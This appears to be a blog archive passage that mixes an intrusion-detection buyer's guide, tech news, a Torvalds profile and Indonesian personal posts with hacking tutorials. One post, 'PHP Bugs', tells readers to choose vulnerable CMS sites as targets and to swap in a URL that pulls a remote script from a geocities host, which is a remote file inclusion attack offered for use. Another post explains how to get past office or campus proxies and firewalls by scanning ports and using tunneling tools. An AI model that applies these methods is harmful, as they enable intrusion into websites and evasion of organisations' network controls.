Unless, that is, you also have an intrusion detection system. While those other defenses are there to stop bad things getting onto your network, an intrusion detection system is there to find and defeat anything that might just slip through and already be on your system. And in today's world, you really must assume that things will slip through - because they most certainly will. From the outside, you will be threatened by indiscriminate virus storms; from hackers doing it for fun (or training); and more worryingly from organized criminals specifically targeting you for extortion, blackmail or saleable trade secrets.

From the inside, you will be threatened by walk-in criminals using social engineering skills to obtain passwords to, or even use of, your own PCs; by curious staff who simply want to see what their colleagues are earning; and by malcontents with a grievance.

What you really mustn't assume is that this is fanciful, or that you don't have anything worth stealing. According to experts in the field, even something as basic as stored HR data on your employees is worth $10 per person on the black market. Search for 'FBI' on this site and see the variety of attacks and dangers that exist, and how often there is a degree of success despite firewalls, anti-virus and access control. You still need all of those defenses - but you also need an intrusion detection system.
What do I need in IDS?

Intrusion detection describes the intention - not the methodology. There are several different ways by which this can be achieved; so anything that detects intrusions is an IDS. Which method you choose really depends upon what you need: and if you don't already have in-house security expertise, it would be worth employing a consultant to help reach your decision.

Note that IDS is no longer a new technology - it's a mature technology. Since the term is no longer new, it no longer has that 'buzz' required by marketing managers. This has been aggravated by analyst firm Gartner proclaiming that IDS is dead, replaced by IPS. This is wrong. Ignore it. IPS is different from IDS. Vendors and security experts know this, but the result is that manufacturers are tempted to find new terms - and one of these is Network Behavior Analysis. This is a good and useful approach, but one of the primary purposes of NBA is to detect intrusions - in other words, IDS.

Remember, too, that good security is the right level of security for you. You need to strike the right balance between the cost of the security and the value of your goods - there's no point in spending more on security than the value of what you're protecting. Risk management principles using a thorough risk analysis will help you decide how much to spend.

Armed with this information, you can look for features such as:

* attack halting (stops the attack, whether it is a program or a hacker)
* attack blocking (closes the loop-hole through which the attacker gained access)
* attack alerting (either pop-up to an online admin, or email or SMS to a remote admin)
* information collecting (on what is done by the attack to the network, and from where the attack came - helps gather forensic evidence should a prosecution become necessary or possible)
* full reporting (so that you can learn from your mistakes, and prevent future problems)
* fail-safe features (such as encrypted messages and VPN tunneling within the IDS to hide its presence from, and inhibit interference by, any hacker).
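
As a toy illustration of the "attack alerting" idea, here is a minimal Python sketch that flags repeated failed logins from one source address. The log format and threshold are invented for the example; real IDS rules are far more sophisticated:

```python
import re

# Matches a simplified failed-login log line (invented format).
FAILED = re.compile(r"Failed password for (\w+) from ([\d.]+)")

def alert_on_failures(lines, threshold=3):
    """Toy alerting rule: return the source IPs that accumulated
    at least `threshold` failed login attempts."""
    counts = {}
    for line in lines:
        m = FAILED.search(line)
        if m:
            ip = m.group(2)
            counts[ip] = counts.get(ip, 0) + 1
    return [ip for ip, n in counts.items() if n >= threshold]

log = [
    "Failed password for root from 10.0.0.5",
    "Failed password for root from 10.0.0.5",
    "Failed password for admin from 10.0.0.5",
    "Failed password for bob from 10.0.0.9",
]
print(alert_on_failures(log))  # ['10.0.0.5']
```

A production system would feed such alerts into the pop-up/email/SMS channels mentioned above rather than just printing them.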

If you've got a large network, or particularly valuable information, you may like to look out for the extras offered with some intrusion detection systems:

* honeypot or padded cell (a fake network or area designed specifically to attract and contain attacks, so that you can analyze them and learn from their behavior)
* vulnerability analysis (so that you can check your network for all known vulnerabilities in order to pre-empt rather than just detect intrusions)
* file integrity checker (a mathematical way of knowing if a file has been altered in any way, and therefore potentially compromised by an intruder)

One other point - don't think that you're so small you don't need, or can't find, an IDS. IDS as described above is available for large enterprises on down. But even if you just have a couple of PCs, you can still get, and still need, an intrusion detection system. It's just that for a single desktop system it goes by different names and has fewer automated features: it's a personal firewall and an anti-spyware program. The purpose is the same - to detect and stop intrusions - it's just that here you have to keep it up to date manually and conduct regular scans yourself, and it isn't as intelligent or sophisticated.
Where do I get IDS?

Here are a few suppliers to get you started - but keep checking back to this resource center, because we'll be adding more companies and more products all the time:

* AirDefense
* Arbor Networks
* CounterStorm
* Enterasys
* GFI
* ISS
* Lancope
* Snort
* SonicWALL
* StillSecure

It will also be worth looking at Unified Threat Management. This is often a physical device, an appliance, and it just means that you get more than one security feature in a single box. Unified Threat Management will frequently include an IDS.
How can I evaluate IDS?

The first thing you need to do is make sure that you know what you need and what you can afford. Then you need to know what's available. Only then can you decide what to get. So first check the Buyer's Guide in this resource center to see what you can get. Conduct a risk analysis exercise - use a consultant if you need to. And then, knowing what is available and what you need, consult our Comparison Guide and see which product comes closest to that need. And if you have specific queries, problems or worries, get some free help and advice from Ask the Experts.

Google Working To Make 'iPod/iTunes for Books'

nettamere writes to mention an initiative by Google to take the library online. As the end result of Google Book Search, the company hopes to see a future in which it is not merely referring customers to Amazon, but instead offering them the ability to download books directly. According to the Times Online, Google hopes to 'do for books what the iPod did for music'. From the article: "One of Google's partners, Evan Schnittman of Oxford University Press, said he foresaw a number of categories becoming popular downloads: 'Do you really want to go on holiday carrying four novels and a guide book?' The book initiative would be part of Google's Book Search service and its partnership with publishers, which will make books searchable online with publishers' approval. At present, only a sample of each book is available online."

Sunday, January 21, 2007

Linus Torvalds

By giving away his software, the Finnish programmer earned a place in history

By PETER GUMBEL

Linus Torvalds was just 21 when he changed the world. Working out of his family's apartment in Helsinki in 1991, he wrote the kernel of a new computer operating system called Linux that he posted for free on the Internet — and invited anyone interested to help improve it.

Today, 15 years later, Linux powers everything from supercomputers to mobile phones around the world, and Torvalds has achieved fame as the godfather of the open-source movement, in which software code is shared and developed in a collaborative effort rather than being kept locked up by a single owner.

Some of Torvalds' supporters portray him as a sort of anti-Bill Gates, but the significance of Linux is much bigger than merely a slap at Microsoft. Collaborating on core technologies could lead to a huge reduction in some business costs, freeing up money for more innovative investments elsewhere. Torvalds continues to keep a close eye on Linux's development and has made some money from stock options given to him as a courtesy by two companies that sell commercial applications for it.

But his success isn't just measured in dollars. There's an asteroid named after him, as well as an annual software-geek festival. Torvalds' parents were student radicals in the 1960s and his father, a communist, even spent a year studying in Moscow. But it's their son who has turned out to be the real revolutionary.

Saturday, January 20, 2007

Microsoft to Introduce VPN Tunneling Protocol

A new secure VPN tunneling protocol is cooking in the labs at Microsoft. The new form of VPN tunnel is called SSTP (Secure Socket Tunneling Protocol). Microsoft is scheduled to introduce SSTP in Windows Vista Service Pack 1 and in Longhorn Server.

Currently, there are issues with VPN connections when PPTP GRE ports or L2TP ESP ports are blocked by a firewall or a NAT router, preventing the client from reaching the server. Microsoft is working to deliver ubiquitous connectivity through VPN.

The Secure Socket Tunneling Protocol “will allow VPN tunnel connectivity across any scenarios i.e. behind NAT routers or firewalls or web proxies. And the best part of it - your end user remote access experience (like using RAS dialer) and network administration experience (like using RRAS server) remains same as before. i.e. SSTP based VPN tunnel just acts as a one more VPN tunnel that gets plugged into MS VPN client and VPN servers,” revealed Samir Jain, Lead Program Manager, RRAS, Windows Enterprise Networking, adding that the SSTP based VPN protocol will be made available as a beta together with Longhorn server Beta3.

Via the Secure Socket Tunneling Protocol (SSTP), the VPN tunnel will function over Secure-HTTP. In this manner, the problems with VPN connections based on the Point-to-Point Tunneling Protocol (PPTP) or Layer 2 Tunneling Protocol (L2TP) will be eliminated. Web proxies, firewalls and Network Address Translation (NAT) routers located on the path between clients and servers will no longer block VPN connections.

“The good part of SSTP is it integrates with MS RAS client/server infrastructure seamlessly. For example, SSTP supports password + strong user authentication (like smart-card, RSA securID, etc) using various PPP authentication algorithm. Other features of RAS (like generating profiles using connection manager administration kit, remote access policies, etc) - just works - similar to other PPTP/L2TP,” added Samir Jain.

Microsoft, Google Agree to NGO Code of Conduct

"Technology companies have come under fire for providing equipment or software that permits governments to censor information or monitor the online or offline activities of their citizens. For example, last year, Google's approach to the China market was criticized over its creation of a censored, local version of its search engine. Microsoft, Google, and two other technology companies will develop a code of conduct with a coalition of nongovernmental organizations (NGOs) to promote freedom of expression and privacy rights, they announced Friday. The two companies, along with Yahoo and Vodafone Group, said the new guidelines are the result of talks with Business for Social Responsibility (BSR) and the Berkman Center for Internet & Society at Harvard Law School."

Friday, January 19, 2007

Melangkah ke Depan (Stepping Forward)

The Life Journal of Someone Named Arthur

That's my friend, who just rebuilt his blog after abandoning his old one. And he proudly declares himself with that fake modesty that secretly talks itself up... Hey, why am I getting worked up ^_^ just kidding, Thur.

Arthur is a skinny, fair-skinned guy who, it turns out, is of Manado-Chinese-Balinese descent (pretending I only just found out). With his handsome face he is always adored by the women around him. Besides his attractive looks, his brain is sharp too (so sharp it overflows and leaves his head hollow; kidding again, Thur ^_^).

Enough, I'm tired of talking about Arthur; I'm bored of looking at him from the moment my eyes close until they close again (or maybe that's just because my eyes are narrow ;) Anyway, the point is: Arthur is onyon, and onyon is Arthur... what else can I say... enough, I'm just rambling now.

Sleepy, haven't slept in two days, busy... chasing girls... wait, now I'm really rambling. The not-sleeping part is true, though... chasing deadlines, man.

That's enough for today... stepping forward... sleep first... zzzz...

Judge Rules That IBM Did Not Destroy Evidence

"From the latest in the SCO saga, Judge Wells ruled today that IBM did not destroy evidence as SCO claims. During discovery, SCO claims it found an IBM executive memo that ordered its programmers to delete source code, and so it filed a motion to prevent IBM from destroying more evidence. The reality of the memo was less nefarious. An IBM executive wanted to ensure that the Linux developers were sandboxed from AIX/Dynix, so he ordered them to remove local copies of any AIX code from their workstations so that there would not be a hint of taint. The source code still existed in CMVC and was not touched. Since the source code was still in CMVC, Judge Wells ruled IBM did not destroy it. Incredibly, SCO's Mark James requested that IBM tell SCO how to obtain the information. IBM's Todd Shaughnessy responded that during all of discovery (when IBM gave SCO a server with their CMVC database) SCO never once said that it was unable to find that information in CMVC. Judge Wells asked IBM to help SCO out in any way it could."

The Human Brain Must Forget the Mother Tongue When Learning a New Language

The process is named "first-language attrition"
By: Stefan Anitei, Science Editor

After a year of study abroad in Spain, you surely master the language of the conquistadors like no one around you, but why is everyone picking on you and saying you are boasting? (Believe me, I personally experienced something like this.) In fact, people in this situation find it hard to return to their native language. This phenomenon is named "first-language attrition," and it puzzled researchers for a long time: how is it possible to forget, even momentarily, words you have used fluently all your life?

Psychologist Benjamin Levy and Dr. Michael Anderson at the University of Oregon found that this forgetting is not a passive effect of the simple disuse of the mother tongue, but an active process driven by the brain itself, which impedes us from using those native-language words that would make learning and speaking the new language harder. This forgetfulness is in fact an active, adaptive strategy for better "catching" the second language.

The researchers asked native English speakers who had completed at least one year of college-level Spanish to repeatedly name various objects in Spanish.

The more the students used the Spanish words, the harder they found it to retrieve the corresponding English words for the objects.

In fact, using the foreign language inhibits the corresponding words in the native language, which appears as "first-language attrition." Nevertheless, the more fluent the bilingual students were, the less prone they were to the attrition. Thus, "first-language attrition" is a key factor during the initial stages of second-language learning.

When we begin to learn a new language, our brain starts to actively inhibit our easily accessible native-language words while trying to imprint the new language in our mind.

As bilingualism advances, the attrition becomes less necessary, so the more fluent subjects in the study were better at shifting between the two languages.

It may look paradoxical, but "first-language attrition provides a striking example of how it can be adaptive to (at least temporarily) forget things one has learned."

Knoppix 5.1.1: Now with eye candy

The new year has brought a new release of the Knoppix live CD. Along with the usual updates to application software, the most noticeable change in version 5.1.1 is the inclusion of the Beryl 3-D desktop with the Emerald theming engine.


Since support for Beryl is still experimental, the 3-D desktop is provided in Knoppix as an option. To enable it, you have to use the knoppix desktop=beryl cheat code on boot. Considering the current status of Beryl, the new 3-D desktop works surprisingly well; it starts without any problems on a lowly Acer TravelMate 243 laptop with an Intel 82855 GM integrated graphics controller, and it feels snappy and is a joy to use. While some may consider the inclusion of Beryl in Knoppix a gimmick, it provides a great introduction to the whole 3-D desktop idea. Installing Beryl can be a tricky and time-consuming business, so the ability to try the fancy 3-D desktop with zero effort is a boon for all users looking for some Linux eye candy.

As usual, most software packages have also been updated. Knoppix 5.1.1 comes with KDE 3.5.5, GNOME 2.14 (available in the Knoppix DVD edition only), and OpenOffice.org 2.1. Following the recent Mozilla/Debian controversy, the Firefox browser and the Thunderbird email client have been replaced in Knoppix 5.1.1 with Iceweasel and Icedove respectively. Among useful software additions is the mkbootdev script, which allows you to create a bootable USB stick -- a handy tool for making a USB version of Knoppix. Of course, the most important software news in Knoppix 5.1.1 is without a doubt the inclusion of the latest Frozen Bubble game, which now supports multi-player network games.

Knoppix 5.1.1 also features a number of significant changes under the hood. The UnionFS file system has been replaced with aufs (Another UnionFS). According to the changelog, aufs is a more streamlined implementation of UnionFS that fixes many bugs still found in the original file system. The latest version of Knoppix comes with the NTFS-3G driver that offers full read/write operations on NTFS partitions. This makes Knoppix an even better tool for troubleshooting Windows-based machines.

As always, the new version of Knoppix comes in CD and DVD editions, which are available for download from mirrors listed at the Knoppix Web site. All in all, this release continues the fine tradition of delivering solid updates to the already great live CD Linux distro.

Dmitri Popov is a freelance writer whose articles have appeared in Russian, British, German, and Danish computer magazines.

Thursday, January 18, 2007

Indonesia's Largest IP/MPLS Core Expands In NGN Rollout

PT Telkom Commits to M-Series Multiservice Platform for Advanced IP Services.

Siemens and Juniper Networks, Inc. today announced that PT Telkom, Indonesia’s leading telecommunications service provider, has further expanded its IP/MPLS-based core infrastructure with additional Juniper Networks M-series multiservice routing platforms including the M320. The upgrade, performed by Siemens, builds on PT Telkom’s existing M-series routers, deployed last year as part of an initial Next Generation Network (NGN) rollout. The new deployment spans 17 cities, connecting softswitch systems and legacy routers.

“After more than a year of intensive use, our earlier M-series deployment has demonstrated the superiority and flexibility of Juniper’s JUNOS Operating System,” said Mr. Abdul Haris, PT Telkom’s Director of Network and Solutions and the service provider’s Chief Technology Officer. “We were also impressed by the routers’ traffic engineering capability, strict QoS adherence even under extremely heavy load, and Juniper’s high availability features, such as fast reroute and in-service upgrading. We are confident to stay with Juniper and its routing solutions for our long-term NGN strategy.”

The M-series multiservice routers are part of Juniper Networks' family of best-in-class routing platforms, which also includes the market-leading E-series Broadband Services Routers and T-series next-generation core routers. Juniper Networks E-, M- and T-series routing platforms deliver industry-leading levels of performance, reliability and scale to enable service providers to deliver high-quality voice, video, data and other advanced services over an IP/MPLS network with assured levels of performance and security. The T-series is the industry's most proven core routing platform and, with the multi-chassis TX Matrix technology, allows service providers to scale to multi-terabit rates without the risks associated with new and unproven technologies.

“Our M-series deployment at PT Telkom is a great example of the benefits of migrating to a next generation IP/MPLS-based infrastructure,” said Adam Judd, vice president of Asia Pacific for Juniper Networks. “Asia Pacific’s need for capacity to deliver advanced services – including VoIP, realtime video, broadband access, and VPN services – continues to grow, and service providers such as PT Telkom are leveraging Juniper’s industry leading platforms to address this demand and capture new revenue opportunities.”

The Contradictory Nature of OOXML

"The Microsoft Office XML-based format specification, OOXML, is now in the adoption queue at ISO/IEC. That process takes six months and has two steps. During the first one-month step, any member may submit 'contradictions,' meaning aspects in which a proposed standard conflicts with already-adopted ISO/IEC standards and Directives. Those contradictions must then be 'resolved' (which does not necessarily mean eliminated), and these resolutions are then presented back to the members to consider during the five-month voting stage that follows. A month isn't very long to do a line-by-line analysis of a 6,000-page spec, but experts in the national standards bodies around the world are doing just that. What they are finding includes the use of proprietary, hard-wired elements rather than incorporation of available ISO/IEC standards; additional Microsoft technology that must be emulated (but is not covered by the Microsoft patent pledge); elements that can't be implemented without Microsoft technical assistance; dependencies on Windows itself; mandatory bugs; and more. And then there's also the fact that OOXML heavily overlaps ODF — a platform-independent, already-adopted ISO/IEC standard. It promises to be an interesting battle." And an anonymous reader adds word of the release, after 10 months of development, of Docvert 3.0, an open-source web service that converts DOC files to OASIS OpenDocument 1.0 (download the source here).

Monday, March 20, 2006

LOVE ISN'T BLIND

"When two people love each other, nothing is more imperative and delightful than giving." - Guy de Maupassant -

Love stands on feeling as well as common sense. The first misconception Bowman challenges is that people fall in love on feeling alone. True, we fall in love with the heart. But to avoid causing chaos later on, we are expected to use common sense as well.

It is a big lie that we can simply fall in love without being able to resist. What actually happens is that the process of falling in love is shaped by the traditions, habits, standards, ideas, and ideals of the group we come from.

It is an equally big lie that we may do whatever we like when in love, and cannot be held accountable if those impulsive acts someday turn out badly.

Losing perspective is not a sign that we are in love, but a signal of foolishness. Love needs a process; Bowman also rejects the notion that love can come from a first glance. "Love grows and develops and is a complex emotion," he says.

To grow and develop, love needs time. So it really is not possible to simply love, just like that, someone whose background we know nothing about.

Love never strikes suddenly, nor does it fall from the sky. Love arrives only when two individuals have managed to reorient their lives and decided to choose the other person as a new focal point. What may actually be happening in the phenomenon of "love at first sight" is that the couple is struck by a very strong mutual attraction, even to the point of infatuation. That compulsive feeling then develops into love without ever pausing in between. In cases of "love at first sight," many people do not truly love their partner; they fall in love with the concept of love itself. People who truly love, by contrast, love their partner as a whole personality.

Love does not dominate or surrender; it shares. It is not love if we intend to control our partner, nor is it love if we constantly give in for the beloved's satisfaction. A person who loves does not regard the beloved as a superior or a subordinate, but as a partner to share with and to identify with. If we want to dominate our beloved (restricting their social life, forbidding them positive activities, dictating their taste in clothes, forever criticizing all their shortcomings), or only ever give in (never protesting when the beloved behaves badly, not minding being a low priority), it means we are not yet ready to give and receive love.

Love is constructive.
A person who loves does their best for their own sake and for their partner's (pride). They dare to be ambitious, to dream constructively, and to plan for the future. Not so the impulsive lover. Instead of thinking and acting constructively, they lose their ambition, their appetite, and their interest in everyday matters. All they think about is their personal misery. Their dreams, too, are unattainable; those dreams can even become a substitute for reality.

Love counts as healthy when we like our partner to a comparable degree whether we are near them or far from them.

Love does not rest on physical attraction.
In a love relationship, physical attraction does matter. But it is dangerous if we like the beloved only physically and dislike them for many other reasons. When in love, we enjoy and attach deep meaning to every physical contact. Physical contact, mind you, only feels pleasant when we and our partner like each other's personalities. So it is not love but lust if we regard physical contact as nothing more than a pleasant sensation without meaning. In love, affection takes shape later, as the relationship deepens; lust demands physical gratification from the very start.

Love is not blind; it accepts.
Is love blind? Not at all. A person who loves sees and is aware of the beloved's bad sides. Because their love is great, they try to accept and tolerate them. Of course there is a wish for those bad sides to improve, but that wish must be grounded in care and good intentions. There must be no harsh criticism, rejection, resentment, or disgust. It is lust that is blind. However bad the partner, a person in a relationship driven by lust accepts them with no wish to improve anything, and then leaves the partner once their desires are satisfied, merely because the partner has some small flaw that could very well have been fixed.

Love minds the relationship's future.
A person who truly loves pays attention to how the relationship with the beloved develops. They avoid anything that might damage it, and as far as possible do the things that strengthen, sustain, and advance the relationship. Someone who is merely infatuated may also try hard to please the beloved, but only so that the beloved will accept them and the satisfaction they are after can be reached. A person who loves pleases their partner in order to strengthen the relationship.

Love dares to do painful things.
Besides trying to please the beloved, a person who genuinely loves has the attention, concern, understanding, and courage to do things the beloved dislikes, for their own good. Like a mother who says "no" when her child, who has the flu, asks for ice cream.

That is how we should all treat our partners....

Friday, March 03, 2006

PHP Bugs

Originally I wrote the PhpInjection piece only as a quick bit of background. But it seems many people are still asking about it, and more and more bugs seem to be found by the day. This is also because more and more people use and rely on a CMS (content management system) as a quick way to build a website. A CMS does make building a website very fast, but, without anyone realizing it, it also makes one website the same as the next.

And if they are the same, being built on the same scripts, then their bugs are the same too. Below I attach the list of bugs I found. Use it to pick targets.

Just look here

From that list you can begin your search. Once you have a target, just change:

http://www.injection.com/cmd? into http://geocities.com/k4k3_rgb/test?&cmd

And there you go; see the result. If it doesn't work, it has already been patched, so just move on and find another.

Friday, February 24, 2006

Getting Around the Proxy Server

One day a friend asked me: "Hey, why can't I open Friendster at my office? I think it's blocked on the server....". Why does this happen? Because of the proxy server and the firewall rules on the gateway.
Before that, let me give a brief picture of what a proxy server and a gateway firewall are.

Proxy server:
What is a proxy server? Let's ask 'Auntie Wiki' first...
"A proxy server is a computer that offers a computer network service to allow clients to make indirect network connections to other network services. A client connects to the proxy server, then requests a connection, file, or other resource available on a different server. The proxy provides the resource either by connecting to the specified server or by serving it from a cache. In some cases, the proxy may alter the client's request or the server's response for various purposes.
A proxy server can also serve as a firewall."

In short, it is a server or machine that manages data traffic on a network and stores previously visited web pages in its cache to manage bandwidth usage. The picture is this: a URL that has already been visited is kept in the cache, and later requests for that URL are directed to the cached copy, or handled according to whatever rules are set. Some organizations set such rules to restrict what users may do: for example, an office where www.friendster.com cannot be opened during office hours, or a campus or school network where websites with pornographic or violent content cannot be opened.
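The client-to-proxy-to-origin flow described above can be sketched with Python's standard library. This is only an illustration: the proxy address 203.0.113.10:3128 is a made-up placeholder (from the documentation IP range), not a real server, so the final request is left commented out.

```python
import urllib.request

# Hypothetical proxy address -- a placeholder, not a working proxy.
# Replace with the host:port of an actual proxy server.
proxy = urllib.request.ProxyHandler({"http": "http://203.0.113.10:3128"})
opener = urllib.request.build_opener(proxy)

# Every request made through this opener goes to the proxy first;
# the proxy then fetches the target URL on the client's behalf
# (or serves it from its cache) and relays the response back.
# opener.open("http://example.com/")  # commented out: the proxy above is fictional
```

The same idea applies system-wide when the browser's proxy settings point at the gateway: the client never talks to the origin server directly, which is exactly what lets the proxy cache pages and enforce rules.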

Firewall:
I covered this one on a previous occasion; see the article 'Si Tembok Api' (The Wall of Fire). The essence: a system, whether hardware or software, that controls and logs the data traffic going out of and coming into the local network.

Because rules have been imposed on both of these systems, we cannot use the internet however we please. But don't worry: it turns out all of it can be worked around.

1. First method:
Once again, everything is governed by rules, in this case about which traffic and which ports may be used. The simplest way past this restriction is to use an anonymous browsing service or another proxy server outside our own organization's proxy or gateway. Why does this work? Because all that gets logged is that we opened the URL of that anonymous browsing service or external proxy; whichever URL we then visit through it is not visible to our own proxy or firewall.

For examples, just try: www.guardster.com, www.freebrowsing.com, etc.
For proxy lists, have a look at: http://familycode.atspace.com/irc.htm or http://www.samair.ru/proxy/socks.htm

2. Second method:
The second method is to 'tunnel' through our proxy server. This one needs a bit of knowledge and information. As I said earlier, it is all just a matter of which traffic is allowed and which ports are used. So find out which ports are open and what they are used for: do some scanning. Once you know, use one of the many tools available on the internet for proxy tunneling. Don't be lazy; there are plenty. Just ask Uncle GOOGLE with the keyword "proxy tunneling".
Examples: InvisibleBrowsing, Bypass Client, Proxyway, etc.
Then configure the proxy to use and, if necessary, set the port as well.

So that is how to get around the proxy at your office or campus. There is actually one more method, and it is quite easy. It is a gift from our famously kind-hearted uncle who provides us with everything: yes, our 'Uncle Google'. GOOGLE: not for searching this time, but for staying anonymous. How? We use one of its facilities, namely Translate.

Just try: http://translate.google.com/translate?u=

This is actually Google's facility for translating a website's content, but if there is nothing to translate, the original is shown. This method is rather old, though, and a smart admin can block it.
That's all I'll share for now.
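The trick above is nothing more than appending the target page as the `u=` query parameter of the translate URL. A minimal sketch of that URL construction (the endpoint is the one quoted in the post; as noted above, it is old and may well be blocked or retired by now):

```python
from urllib.parse import quote

# The page we want reached on our behalf (just an example target).
target = "http://www.friendster.com/"

# Percent-encode the target and append it as the u= parameter,
# exactly as in the old translate trick described above.
url = "http://translate.google.com/translate?u=" + quote(target, safe="")
print(url)  # -> http://translate.google.com/translate?u=http%3A%2F%2Fwww.friendster.com%2F
```

From the local proxy's point of view, the only host contacted is translate.google.com; the real destination is hidden inside the query string.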

That's the end of this tutorial. This article was written purely for educational purposes; any actions taken as a result of reading it are not the author's responsibility.

The Power of Uncle Google

After a long while without a new post, today I can finally write one again. A few days ago I was out of town, so never mind posting, I didn't even have an internet connection. On this occasion I'd like to share a little information about one of the most powerful search engines in the world. You are probably no stranger to using it: "GOOGLE", yes, that is our search engine, the one that makes it easy for all of us to find information about anything in the world in no time at all. Or, by its affectionate nickname, 'Uncle Google'.

On this occasion I will just give you a few tips on using all of Google's facilities.
Let's get right to it. To see what facilities Google offers, have a look at this link:

-= http://www.google.com/intl/en/options/ =-

Those are all the services Google provides. In this first post I will only give a few tips on using Google.

1. First, search in detail. Enter your keywords as completely as possible, so the search is better targeted. Below I attach some Google syntax:

-. [intitle:]
Lets us search by the title of a web page; Google will restrict the results to match our request. Example: "intitle:login" makes Google show every web page with "login" in its title. Keep in mind that these commands only recognize the one word right after them. If we use "intitle:login password", Google shows pages with "login" in the title that also contain the word "password" somewhere on the page.
If we want pages whose title contains "login password", we type "allintitle:login password".

-. [inurl:]
Restricts the results to pages whose URL contains the given term. Example: "password inurl:www.jasakom.com" searches for the keyword password on pages whose URL contains www.jasakom.com.

-. [site:]
Restricts the search to a particular site or domain. Example: "hacking site:co.id" searches for the keyword hacking on all sites in the .co.id domain.

-. [filetype:]
Restricts the search to files with a particular extension. Example: "filetype:doc site:gov" shows all links to files with the .doc extension in the gov domain.

-. [link:]
Shows the web pages that link to a particular site. Example: "link:www.123.net" shows every page that has a link to www.123.net.

-. [related:]
Shows results similar to the specified site. Example: "related:www.blackhat.com" lists pages similar to blackhat.com.

-. [intext:]
Searches for particular words in the body text, ignoring the URL and the page title. Example: "intext:exploits" shows web pages containing the word exploits.

-. [phonebook:]
Helps search for a person or an address. Example: "phonebook:Anto+Bandung" shows information about a person, in the form of an address, in the searched location.
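The operators above are plain text prepended to the query, so a query can just as well be assembled programmatically. A small sketch that builds a search URL combining the filetype:/site: example from the list (the query construction is the point here; the result page itself is, of course, up to Google):

```python
from urllib.parse import urlencode

# Combine two of the operators described above into a single query string.
query = "filetype:doc site:gov"

# urlencode percent-encodes the colons and turns the space into '+',
# producing a URL Google's search endpoint will accept.
url = "https://www.google.com/search?" + urlencode({"q": query})
print(url)  # -> https://www.google.com/search?q=filetype%3Adoc+site%3Agov
```

Typing the same string into the search box does the identical thing; the URL form is just convenient for bookmarks or scripts.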

That is all for this bit of sharing about the 'GOOGLE' search engine.


Source: the book 'Hack Attack, Konsep, Penerapan dan Pencegahan'